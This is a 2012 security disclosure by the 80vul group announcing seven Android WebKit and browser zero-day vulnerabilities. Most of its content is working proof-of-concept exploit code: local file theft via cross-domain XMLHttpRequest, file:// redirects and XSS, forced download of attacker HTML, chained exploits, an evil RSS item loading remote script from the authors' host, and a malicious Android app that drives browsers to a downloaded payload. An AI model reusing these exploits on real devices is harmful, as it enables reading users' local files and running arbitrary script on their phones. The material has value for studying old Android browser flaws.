Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2012/2/8
References: http://www.80vul.com/android/android-0days.txt
Ph4nt0m Webzine 0x06 has been released[http://www.80vul.com/webzine_0x06/],there three papers on the android application security about the development environment,browser security, inter-application communication.And published a lot of 0days:
[0day-NO.0] android-webkit local cross-domain vulnerability
android-webkit allow local html files cross any http domain and the local file.demo:
<script>
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP',
'Microsoft.XMLHTTP',
'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0',
'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;
//xmlhttp.open("GET", "file://///default.prop", false);
//xmlhttp.open("GET", "http://www.80vul.com/", false);
xmlhttp.send(null);
var ret = xmlhttp.responseText;
alert(ret);
</script>
[0day-NO.1] android-webkit cross-protocol vulnerability
this vul allow cross to the file protocol from http. demo:
<iframe name=f src="location.php" ></iframe>
<script>
function init(){
f.location = "file:///default.prop";
}
setTimeout(init,5000)
</script>
location.php codz:
<?php
header("Location:file:///80vul.com");
?>
[0day-NO.2] android-webkit file:// protocol xss vulnerability
ON android-webkit File:// protocol, the lack of filtering on the directory and file name,Lead to cross-site scripting attacks. demo:
visit this : file:///80vul.com/<script>alert(1);</script>
[0day-NO.3] android-browser/firefox auto download the file vulnerability
android-browser/firefox Handle the Content-Disposition: attachment, lack of safety tips.So through this vul allows users to automatically download the evil html file to the local directory.
test this code:
<?
//autodown.php
header("Content-Disposition: attachment:filename=autodown.htm");
$data=<<<android_xss_go
<script>alert(/xss/);</script>
android_xss_go;
print $data;
?>
the local file name and the path:
android 1.x --> /sdcard/download/autodown.html
android 2.x-3.x --> /sdcard/download/autodown.htm
android 4.0 --> /sdcard/download/autodown.php
firefox --> /sdcard/download/autodown.php
So,Let's play a jigsaw puzzle:
POC[1]:
//[0day-NO.1]+[0day-NO.2]
<iframe name=f src="location.php" ></iframe>
<script>
function init(){
f.location = "file:///ssss<sc"+"ript>alert(1);</sc"+"ript>/";
}
setTimeout(init,5000)
</script>
POC[2]:
//[0day-NO.1]+[0day-NO.3]
<meta http-equiv="refresh" content="0;URL=autodown.php"/>
<iframe name=f src="location.php" ></iframe>
<script>
function init(){
f.location = "file:///sdcard/Download/autodown.htm";
}
setTimeout(init,5000)
</script>
Now ,We can execute arbitrary js code on the local domain, and we can cross any http domain and the local file used [0day-NO.0].
and go on ...
[0day-NO.4] webview.loadDataWithBaseURL() cross-protocol vulnerability
By controlling the second argument of webview.loadDataWithBaseURL(),can cross the file:// protocol use javascript,like <script>window.location='file://///default.prop';</script> .so the dome apk demo:
WebView webview;
webview = (WebView) findViewById(R.id.webview);
webview.getSettings().setJavaScriptEnabled(true);
webview.setWebChromeClient(new WebChromeClient());
String data="80vul<script>window.location='file://///default.prop';</script>";
webview.loadDataWithBaseURL("http://www.baidu.com/", data, "text/html", "utf-8", null);
[0day-NO.5] com.htc.googlereader XSS vulnerability
com.htc.googlereader is an app on HTC Mobile [G10], there is a xss vul on this app, then Decompilation and Found this codz:
label399: String str = this.mHeadlineShown.getSummary();
if (str.trim().contains("<iframe"))
{
this.mWebView.loadData(str, "text/html", "utf-8");
break label246;
}
this.mWebView.loadDataWithBaseURL("http://", str, "text/html", "utf-8", null);
break label246;
the "str" have no filter and can be controlled by evil RSS:
<item>
<guid>http://www.80vul.com</guid>
<title>0day-NO.5</title>
<link>http://www.80vul.com</link>
<description><![CDATA[aa<script src='http://www.80vul.com/xss.js'></script>]]></description>
<dc:creator>80vul</dc:creator>
<category>anddoid</category>
<pubDate>Sun, 04 Sep 2011 13:01:40 -0500</pubDate>
</item>
When opens the unread status of the rss, u can get the XSS vul. and this is mWebView.loadDataWithBaseURL(),so can cross file:// by [0day-NO.4].
[0day-NO.6] Some Browsers for android Cross-Application Scripting Vulnerability
the evil app can cross browser and execute arbitrary js code on the local domain. the demo app codz:
//codz base on http://blog.watchfire.com/files/advisory-android-browser.pdf
package com.x;
//opera
//com.opera.browser com.opera.Opera
//firefox
//org.mozilla.firefox org.mozilla.firefox.App
//android
//com.android.browser com.android.browser.BrowserActivity
import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
public class TesttestActivity extends Activity {
static final String mPackage = "com.android.browser";
static final String mClass = "com.android.browser.BrowserActivity";
static final String gomPackage = "com.opera.browser";
static final String gomClass = "com.opera.Opera";
static final String mUrl = "http://www.80vul.com/autodown.php";
static final int mSleep = 15000;
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
startBrowserActivity(mUrl);
try {
Thread.sleep(mSleep);
}
catch (InterruptedException e) {}
startBrowserActivitygo("file:///sdcard/Download/g.htm");
}
private void startBrowserActivity(String url) {
Intent res = new Intent("android.intent.action.VIEW");
res.setComponent(new ComponentName(mPackage,mClass));
res.setData(Uri.parse(url));
startActivity(res);
}
private void startBrowserActivitygo(String url) {
Intent res = new Intent("android.intent.action.VIEW");
res.setComponent(new ComponentName(gomPackage,gomClass));
res.setData(Uri.parse(url));
startActivity(res);
}
}
评论关闭。